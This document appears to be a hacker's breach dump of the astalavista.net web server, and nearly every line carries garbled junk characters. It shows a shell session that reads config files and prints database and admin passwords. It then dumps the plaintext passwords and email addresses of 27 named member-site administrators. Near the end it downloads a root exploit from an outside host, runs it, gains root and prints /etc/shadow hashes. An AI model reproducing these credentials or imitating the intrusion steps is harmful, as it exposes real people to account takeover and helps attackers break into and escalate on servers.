/ Y ?6 V3 N6 h! q% y0 Ddrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0073 ?$ A/ R3 E; e
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
* |% U( E* F& Z9 `. ]0 [4 Kdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
4 ~4 _- y: g" j z; @6 ydrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
2 w: x4 O' g! Sdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; k- |2 a: S" [$ G- t, `-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg4 o+ X O+ u0 @
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
2 `; z; p+ q0 X( J# ]; I( V% odrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron3 V2 {9 |+ v& W: H- a
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd; x q' ]4 ~" O; |7 ?/ n! b7 o
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
. F C6 Y, \* G% V1 k! a: a-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico0 R3 O5 y) K0 [3 s9 |/ F
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed, k3 q% d6 R* u
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
. D; M" t5 d" w# C" U0 ~-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess% E( @3 Z# O, t7 P- l6 {
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
* R& L4 I d1 }3 \) }8 j. K4 R-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php; f3 Y) ]2 }3 b7 h( H1 h
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html0 W1 y: ` M/ K" @
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
& w5 }: n* d1 T) r9 Q-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php6 J0 t2 k: M& r4 Q# z0 n
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
; v1 M0 }; I& W$ [8 e1 E* ?drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
7 y7 n$ }5 [; N) d0 b% Ydrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
3 K9 l5 k; J- G9 G8 u4 v0 cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib7 X3 c+ ~3 i$ m
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log) O0 Q! Q9 u2 Z
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member% @1 t5 ?4 p+ G
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata% q! v! R$ O [9 n
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new+ {. c) D) _1 h0 q+ R3 x
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf6 ^. F5 C: Y7 E
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re9 r" G2 U7 ]: W3 l1 ~" [
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt7 X& L+ d/ T- h0 n
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
# p+ Y4 d% m+ N1 l/ M% n$ Z" Ydrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
" P" G# O% v0 d, {4 Q( Jdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
$ X5 C0 B$ F3 b) M! F" o( wdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes) n: X) H: t. X& ?& ^( y
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ x4 u X4 R1 @3 p' b) j
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl9 ]1 {! F/ p6 S- e; m
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v26 h L, l& e: p% s. [6 d/ f, \
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
3 E; q) M) B( k' \2 e) f! C-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
2 Y- F+ W$ l" D- U- E! V% S6 Gdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki' C$ a9 ^. s, W# x7 u4 f( O
' x P; d9 T2 M
sh-3.2$ head -20 index.php; x; J$ Z Q' }3 `# ]# R
<?PHP7 m8 y; }4 _+ h( I/ G- U0 M
/**
6 D& P" n: u9 u$ s% P7 u* Mainfile (external) for astalavistaNET v2.0+ y& v( @1 D. G+ q" F
*
' {& v6 Z9 C7 ~/ q* @copyright Astalavista IT Engineering GmbH
1 T4 ^5 ]. U, i' ~7 Q2 H, [* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
# d6 ~8 f+ _/ W. ]! U* @version 1.0
+ I1 c/ |3 l; W, w T' N# y*/
4 A# `4 L) F+ x$ I7 T1 G
5 p: {2 u- t: A% r1 Z% l if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {* ~! Y5 K4 s2 N
$dontStartSession = false;4 E3 [% ]8 T& ]: T. y9 C/ _1 [
} else {
" F$ V$ a6 g+ S4 [2 X' L $dontStartSession = true;
; s. V1 `& Q- V1 z }; W8 h) Z) f5 t1 C) `6 N9 V
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
0 ^& k+ x( E ~5 v6 P require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
1 o* K# `* ?5 l. l" }0 b require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);7 o6 H" F; _+ v! K& F% q8 t
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);8 I8 ~6 M; r& n' z
; k6 U) Q9 k9 osh-3.2$ cd config
: [. B, S* Y. ?; e! ~sh-3.2$ ls -la }2 ?% r$ x0 f
total 32
$ U! z7 L, \8 q% t3 p( X) `drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
6 ?5 H7 j) }( K" q) tdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... u6 Q( R y, o# V6 o* w* m
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php7 M, d, e W# L7 g) _& d) u
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
& N4 ?- u8 h( d-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
4 t, J# F/ ~0 h3 v6 r-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php- D2 L2 ^& [1 }/ N
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php" c' w0 G3 o, F& A% T" Y
p5 P) G/ C- r9 i: J# ^+ Ash-3.2$ cat com.conf.php/ w( r7 L9 A* F" t& E
[snip]
u Y/ V9 K* R+ |$ Z# |' Y//member-database j- B: |1 a; I* b& D' Q+ }
$_CONFIG['db_mem_server'] = ‘localhost’;
! s0 U& P" ?/ f2 |+ A$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
( {- L$ U2 V/ F t$_CONFIG['db_mem_user'] = ‘astanet_db’;$ C) T7 X& l7 w& O
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;6 g# X6 E, x& b
$_CONFIG['db_mem_debug'] = false; //true or false
6 n5 e2 |1 J6 P! E* ~1 _//ads-database
* k/ y: {# K4 F; m. g7 N$_CONFIG['db_ads_server'] = ‘localhost’;% B8 C& d# N; Y* d
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
2 M2 W# \+ U5 d6 f$_CONFIG['db_ads_user'] = ‘astanet_db’;$ o% q% b- C, g$ q; P
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;* J7 d! p% f. E8 E
$_CONFIG['db_ads_debug'] = false; //true or false1 \# F4 P; q- U9 z& ]5 P5 M) ^- K: Q
//rainbow-database
: d8 q7 r, R0 s7 P# A7 A4 i$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;- |- T% D e' Y& Q; {% i: e
$_CONFIG['db_rainbow_database'] = ‘rainbow’;6 i% i& @' _) X7 Z M# t/ t
$_CONFIG['db_rainbow_user'] = ‘dinu’;
0 l9 ~ A. j( g7 {$_CONFIG['db_rainbow_password'] = ‘dinudinu’;, S! s, y+ O9 T' ^6 K# w' r1 _7 C0 c
$_CONFIG['db_rainbow_debug'] = false; //true or false. D; Q# h: r! U7 d5 f3 Q; E
//mailing lists database' A! P3 d R. x7 k/ K
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
% C6 r2 z" x9 ?$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
3 D) X: `, z" Z7 ^" O( ^$ Q) F* h& R* @$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;! z, g& @: g9 q
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;9 [$ N; t7 w- X. `
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
4 z \& O, q1 u. W' E% ]//paypal1 W" d' D& u, k9 @
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
5 x% g; V: F: t8 a2 Z: ]$_CONFIG['sub_pp_cmd'] = ‘_xclick’;4 K/ a+ U1 M/ R( W2 ?
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;& h; @7 D {( N& d8 Z. c4 N
$_CONFIG['sub_pp_noship'] = ‘1′;
: Z: v( }" x( d& z/ _$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
+ ?: G; T8 O$ j- j% A1 b[snip]! T. u0 {( M7 B+ U# |4 p
/ n0 n7 w& `, C: Vsh-3.2$ cd ..
& O) R4 I# X9 N( }. fsh-3.2$ cd member* k: K3 r0 y! T5 M
sh-3.2$ ls -la$ E1 M/ s. T$ w3 X0 T7 U
total 20: z x0 r$ o! [, U4 F4 J8 v
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
) u" G) w2 [% c/ B \8 v( n% R# k7 ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ g! F/ S7 r1 l/ Q1 A8 Z, m
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
' y$ b" N; o* [$ ~-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
, o; {: h2 ~% Z' e/ C7 [sh-3.2$ cat .htaccess$ a- C4 q1 W. r4 c
SecFilterEngine off' ?: @% T) W+ i& f: C! B2 w9 y
0 z' `5 y; q2 ]& Q0 f3 T2 z5 gsh-3.2$ cd ..
/ B2 R6 m4 Q( P) |" e+ Ysh-3.2$ cd cron
. e- C; a/ b! F$ c p* D# Hsh-3.2$ ls -la
7 A3 m, g; s8 b/ K: ]4 [# C$ _: Wtotal 168/ k! W& ?4 K5 @; X
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
' J5 H C; q1 G+ d3 ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ T2 f' t. d4 G' K
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
/ N4 ]. k; `9 K1 P/ A) l9 m-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
* r5 |) q0 i. k, y3 z-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php# q, h+ _5 o# J6 u2 S ?
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
# B' N! N, Z/ k$ A6 @: D-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
, T6 H9 l! f* M0 x L) Q4 d-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
( Z7 v' _" o+ r D1 U; ~3 S& m. Z# T-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php! }7 a! b: p3 g+ s+ C% c, m
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
+ m! m. [- _* I; i3 w' C$ f# T-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
8 G& H2 K* u, A3 Q0 S7 I/ d. Z-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php, e3 U/ N' Z0 B8 @% N
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
+ o1 T5 Z( d* \) |+ F-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php! f2 _7 c$ m) t6 a) c( D2 W
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh; X' ]: ^, a8 r& j
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php: ?% u" }: v8 u6 r( Q$ z) s7 D
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
1 \7 R0 t; i: g2 o% O-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php- z" }1 g1 b* x- P: x8 f
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
3 a7 |6 }+ d2 o0 t4 L5 ]-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php& P0 ]9 e7 T- ^/ _$ w: k
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
: r& H8 \# g$ t3 W- n. G-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php8 C2 r b4 Y1 r/ Z4 `4 i- v
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
5 d- I G4 s$ ~: F, ], Y$ C0 I' }2 c9 P3 n- m
sh-3.2$ cd ..
6 z1 }: x3 H8 Lsh-3.2$ cd _007
. \8 h' h: r9 _( w" [' {/ h! lsh-3.2$ ls -la
1 x0 _, T5 o( W$ ^- a" y; D) Jtotal 240 o6 T2 i- H: z+ s' z+ o# e1 m% S
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .& e9 `4 ?1 y3 c( r4 D @- ^" [
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
( Q" k l3 J$ p( l& N3 h/ c-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess2 H* z3 F a7 i! [) g3 f& M
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php4 p- U/ |* `$ f7 y2 W4 t
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php0 c5 m2 s6 i7 x
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
: b/ U/ I, }# s& a0 B, e" z+ n, R( M. x% I8 f3 G e
sh-3.2$ cat .htaccess
; _* @& B, u" e& R3 J9 l, h! uauthType Basic; }& s, {1 U! P- r2 |
authName Admin
" r- A+ A& {# x. U7 lauthUserFile /home/astanet/auth/.htadm_pwd0 e# h% ^+ [( A
require valid-user
, [) _5 F3 w1 G( ? Q6 O# x; |4 K8 i/ a) A
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
7 u( o. s+ ~3 f8 a, ^; g' sadmin2net:CR0bl65MwhfT
, u. O4 i0 m/ u/ _, ?
7 [4 M5 _ W+ y+ k2 X0 w) c; Nsh-3.2$ mysql -u astanet_db -p
& S2 r$ {7 I2 _1 \) `Enter password:
1 A A% b! `7 d4 L1 N# F! nWelcome to the MySQL monitor. Commands end with ; or \g.
6 n: i) M0 x6 ^- Y* [: {4 I3 LYour MySQL connection id is 275153
3 X5 }+ k7 ~) w f3 P" H+ |% q, MServer version: 5.0.45-community-log MySQL Community Edition (GPL)
& s8 j' p8 Z% ]* N6 c8 o. R) }& E6 V8 J. P
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! ?: c( v9 w( W$ n, n* b5 W+ H* V
i% k1 G; Y I+ ^) k1 `! h3 Cmysql> show databases;4 E) B3 A w9 l1 G; }" h
+———————–+1 V5 w7 }' D; [7 s& p% k8 n
| Database |
" P. Y m1 n! D+———————–+
' Q- S% f g' u* Z) G: p( b| information_schema |6 L+ A2 @3 S+ t+ P
| astanet_ads |
6 ?# N+ @, L2 L/ n! }9 F| astanet_mailing_lists |4 [4 |: }" i& G7 `+ ^
| astanet_mediawiki |
8 R3 w" \% ]( m3 v' E5 t1 F| astanet_membersystem |
: ], ^+ V' k, [% X+ ~/ G| test |
; S! e7 F7 ?4 g8 Y( M8 Z0 `6 m+———————–+$ F" |5 f5 [: ^' m+ X- q
6 rows in set (0.00 sec)1 G" s. ?3 ~. y& |" A# u
& o) a/ j2 z& {# L: o2 L* F
mysql> use astanet_membersystem. S; ~) v6 w: c, ? D# v
Database changed! ?# [6 e+ H- l) h
mysql> show tables;
8 K6 Y) K8 d9 }1 @) c9 Z+———————————–+
0 S4 Z8 P' z$ U# C| Tables_in_astanet_membersystem |
7 r4 _" W" c m. T3 i+———————————–+, T- w0 j; ?( }) h* ?& @9 t
| blacklist_categories |- ]) ^ l" n/ N5 F, i2 T
| blacklist_content |
+ S. X9 |8 [0 G8 }; m/ W8 ~| blacklist_levels |
) L, R8 V0 L' ]2 f" p6 g| blacklist_mcset |
+ K# X- J `0 ^+ {5 U$ ^ C% H| dir_categories |2 G0 p+ R: u& F0 a! a8 b
| dir_comments |* {+ r4 M5 z6 u. s0 l
| dir_links |
$ v# m# i( g; }2 }4 W+ @3 L- H| dir_temp |1 z" `& `9 T0 b) `- j
| dir_votes |
- {- j# k# T2 g! t) q| documents |
7 \' b2 {5 k: w, c| documents_categories |
5 d4 m7 [ e) n6 S" ^$ |% z| email_content |: h2 c% d2 L! \8 f
| email_settings |! _* o% A4 z; L! z" S& p
| exploits |5 t9 h9 z6 ^% Z* ]. _& _1 h
| exploits_categories |
) m& S" |" o1 j" f0 ^7 ?% f* w+ E| exploittree_categories |
, B* H7 ?6 s! z9 b| exploittree_exploits |
6 \! f# ^7 X) g$ Z% s8 K| home_values |9 E3 H5 \6 {" q e' L. C& c/ O
| iso_countries |( V3 M, ?+ \ O/ l
| links_categories |* Y3 [9 F- U1 w2 ?, k
| links_records |
4 \* C' t' T# U N| links_unauth |
% i# A$ f" w& c* { l ], a& [| links_votes |
3 j) h9 b# i/ C( T, m/ d| log |9 ~% u. l; v) ]* L$ ^
| news_categories |
2 X4 W( q4 K; u) h9 K( A| news_comments |
8 f# f2 K/ q$ o| news_emoticons |5 \$ U9 J# E @+ _# `
| news_latest |
: D3 L+ O+ M' P: M q0 f, `| news_messages |4 p- d* v0 i: m0 s; ?
| news_statistics |
4 m5 l0 }: U; f' {9 q$ W| news_votes |+ t- p u" a% H" Y j4 y, _9 v& r
| prices_content |
0 I3 B+ c, S5 e+ P! m" y| prices_offers |4 ?& a8 j% U+ Q1 W- F
| rss_settings |
, V: h* e; ^1 H+ T/ b! t; j/ O| sessions |4 A4 M/ g! {/ k' D
| stats_signups |* m+ M9 v0 q7 A4 x: p V
| u2u2 |9 E5 X! e& e. Z' j. H
| u2u_contact |
% r: y6 r' {' x9 E) a9 Y| u2u_settings |4 V7 B' Q1 g: |
| user_keywords_selected_categories |
* @& \5 i1 S5 |; ^# R# t3 ?2 A| users |
: }/ b8 Z) C) H. C# v9 X| users_ipn_test |% c4 q) ^4 x7 N% C+ X* T9 o
| users_keyword_values |
) O2 L6 x& C& d4 a9 x, X1 n| users_profile |
0 g P" v0 [# k| users_temp |
) e. w( o% k* e7 z# n1 [: Q; e' e| users_upgrade |
2 P5 V4 R) q5 u' M2 i( ]+———————————–+
* v e2 @0 Q" k, l# t( _4 l! y8 Z, W$ T46 rows in set (0.00 sec)1 I) d4 f' {8 H* O. n; j/ ~
# B; R6 D7 [# H# r
mysql> describe users;) u7 u& z$ ]* c* i D/ i$ w
+————————–+————————————–+——+—–+———————+—————-+5 c+ ^$ u" m1 ^7 W" H: E% Y
| Field | Type | Null | Key | Default | Extra |! X2 w( N- Q3 |: g- {! X: E1 i0 h8 p
+————————–+————————————–+——+—–+———————+—————-+9 W0 M% e/ B( m- n) R5 V0 I
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment | J) x% z# z- _" x3 F* k
| user | varchar(50) | NO | | | |
1 Z9 y0 F# ~* q| nickname | varchar(30) | NO | MUL | anonymous | |- `! U0 G% k$ w9 x6 ]1 s$ Q/ `
| password | varchar(30) | NO | | | |
$ e1 h2 |5 j+ |5 Y! g P| userlevel | tinyint(3) | YES | MUL | NULL | |
& [5 `, o- O3 h6 m| exp | int(8) unsigned | NO | | 0 | | a9 t' l: s$ G4 y, J
| email | varchar(50) | NO | | | |3 j W/ q* Y0 d5 ~, V
| ip | varchar(15) | NO | | 0 | |6 S I( U& h+ d$ Z6 a9 i
| proxy | set(’0′,’1′) | NO | | 0 | |. U. T, Z. ^& N+ h, \
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
{- F2 n$ g- N" r: W# z| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |7 D, j0 _* c3 f4 [$ t1 ~# R
| anz_in | tinyint(1) | NO | | -1 | |
+ v) E ]. @, u$ h$ S. q| status | tinyint(1) unsigned | NO | | 0 | |
5 g0 _! w; p: S4 {9 j2 j6 Z1 Q R| checked | set(’0′,’1′,’2′) | NO | | 0 | |) s/ |0 b( m# y; V+ @9 Q
| freemember | set(’0′,’1′) | NO | | 0 | |
% \! |* ~( m1 A/ ?- n0 B| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
* p: K+ C& h9 r" g| lang | tinytext | NO | | | |/ O2 V+ x+ ~% M! B# w5 l
| adid | smallint(6) | NO | | 0 | |' ~" y" s2 Y' v2 @: y% X
| pp_txn_id | varchar(255) | YES | | NULL | |: J/ Q4 g" l# d( n& M+ h$ U
| cnb_transaction_id | varchar(255) | YES | | NULL | |
; m- F$ ]4 W/ ?3 z1 G9 y| cnb_order_id | varchar(255) | YES | | NULL | |7 m$ q M1 C" x D) k) s
| cnb_user_id | int(11) | YES | | 0 | |( j6 O. o Y; K. L9 i1 z
+————————–+————————————–+——+—–+———————+—————-+# T9 g( |8 Y+ I- t3 z
22 rows in set (0.01 sec)/ f7 k/ }2 m6 A9 G& y- e4 r8 P
, z: h3 w$ l5 P+ Pmysql> select count(*) as skids from users;( ]* v# n: \9 {9 f
+——-++ O, g: t: Z1 K* I
| skids |% L! A0 E1 H: g8 l2 H# x
+——-+7 t1 w8 n, \+ U! x
| 25199 |
2 q/ j, u4 v% ?/ H# ]+——-+& a: a9 V4 B, J$ |6 `( j- S7 n
1 row in set (0.00 sec): E; B5 @$ g1 J7 C% P9 e! h
( K- p( g& @5 {
mysql> select user,nickname,password,email from users where userlevel = 1;' I' s, T% G, x2 Q T
+————————–+———————-+——————+———————————–+6 Y+ A, J; s% \" C
| user | nickname | password | email |; Z1 ^- p1 Y. k) H
+————————–+———————-+——————+———————————–+, ^, |+ L/ r h8 k
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
# ]3 Y+ n; `) `: U/ ?. J- j# V| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |) U7 F! [3 l/ ? J! @0 \
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
) f% w3 j" ]; P* U0 R| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |! W6 u3 p' K, a8 Z/ q- B
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
5 W! S0 I5 c5 X% S: J| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |6 Y7 I, @- E" {0 |* J7 Y( M
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
( I' E8 A5 A, `3 E/ d2 @1 h| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |$ o7 K6 [, G( K& g0 G: m
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
5 E+ o a8 H: {/ j& w4 l| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |7 A- O2 _! E5 O1 O
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |# r; K& \- j& q0 u6 y
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |4 Q8 V& u% C+ b$ j% c4 Y) D, B
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
V5 u8 P! c0 [, m4 r0 J& P| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
( W1 E% u7 t7 x$ ^- q| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
; c1 I7 N' O ~| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
$ Y" X4 b; e( q) @* \' ?) p| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
' D( h# x' |2 ]7 M4 d; j| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |9 i& h4 F1 T7 X2 R9 c2 N7 H
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
+ I! S/ o$ A7 [2 r* C3 ^| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |0 C% p4 c- }2 U6 F! ~6 `$ A
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
5 U7 E, E; V+ [. @! A1 a0 F6 c2 Y| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |; y) [8 W5 ^( P- y9 a0 Q$ d- p) a
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |/ o" ]/ g0 a1 M1 o( n" _9 n4 V
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
% q+ v" N+ h o8 p% Q- z" {3 c| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |: U5 d: b+ l7 q2 a- P
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
" w- @0 R+ f: v) \0 z4 _5 b$ w| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |6 d& ^* a9 e& V' A
+————————–+———————-+——————+———————————–+3 c R0 o: t; E0 W: a" n
27 rows in set (0.00 sec)
2 f! `8 Z, s! }, T: E) u7 B5 A
- X. x' g8 h3 z, \1 n, h+ Pmysql> exit;8 m5 ?9 N+ {" k) u/ _+ x+ p; c
Bye8 I; m1 c% J4 v! L1 s2 P
6 ?; C$ k1 S2 y9 Z8 m5 u- L[~] plaintext passwords? yes,
' @6 c& v3 D( o5 _, H4 Q# VThose so called “security professionals” who charge you $6.66 / month to+ L% n& B. ^2 z' o2 g8 C$ l
register at their hack-proof portal, save your passwords in plaintext…
, t4 ]1 w! o; z A6 u! ?brilliant!
! q: Y6 o. A% u! e
4 a4 m a5 ~5 s[~] This been fun but we want more.
6 k/ U1 Q" W! z C( D6 [( S3 M, S
" A" n8 \8 h& Tsh-3.2$ uname -a( W+ U5 U; ]/ Q4 O/ P6 }- i, K
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. V! e: }2 Q- `2 y2 w: ^
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
. H! D1 O. z9 e2 j–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]& k* K: C# {+ R. Y; t8 r0 x
Resolving anti.sec.labs… 13.33.33.377 x6 h3 ~/ K. M8 E( M$ H4 S6 m
Connecting to anti.sec.labs|13.33.33.37|:80… connected." I+ P) z9 ?4 r/ t2 l, l
HTTP request sent, awaiting response… 200 OK
% Z" L7 V3 w+ ALength: 18200 (18K) [text/plain]
; V' `. n3 v0 z/ A, G; kSaving to: `g0troot’
5 M1 E1 `4 B: d9 V) _5 H
) U" r- b+ r7 u100%[=========================================================================================================================================>] 18,200 58.6K/s in* a, k+ C$ b: e' C* N
0.3s( @: ]( L& y% |. t3 Q
" z7 O$ L' o3 u2 Q6 z
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 s; E. r; l& M. N0 Z! I5 u: E
+ k9 ^" W$ p( s& D/ R, C, gsh-3.2$ ./g0troot -i x86_64
4 y0 `% M+ Z- B) H# N/ ^3 ?[+] g0troot - anti.sec.labs6 n" V. E' V( }" \7 {' z0 W
[+] Target: 2.6.18-128.1.10.el5
+ U3 G" i3 b$ ?' G, { G+ n[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
. d+ q, }% D7 ?5 R7 b8 Y
6 y/ g9 j& F+ m4 X- M; ^) |3 ^* `" t[+] r00tr00t4 ]- g- K4 D( P4 [
[~] Executing shell…5 V# B2 W8 n* T6 C9 c% h4 i; X0 g
2 \1 i8 a; ] ]$ g
sh-3.2# id- d! d+ A* O! ]" ?) i) l) ]/ _+ Q6 i
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
5 O- K1 v% C3 j# _
2 b# t$ ]) h' z7 Q9 a" Nsh-3.2# cat /etc/shadow9 o* t1 U6 h$ X x- o; I% N( B
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::0 p9 o( T8 h& ]# Y7 T4 w# v' J# s
[snip]6 q9 H7 G9 t. A+ u0 j
admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
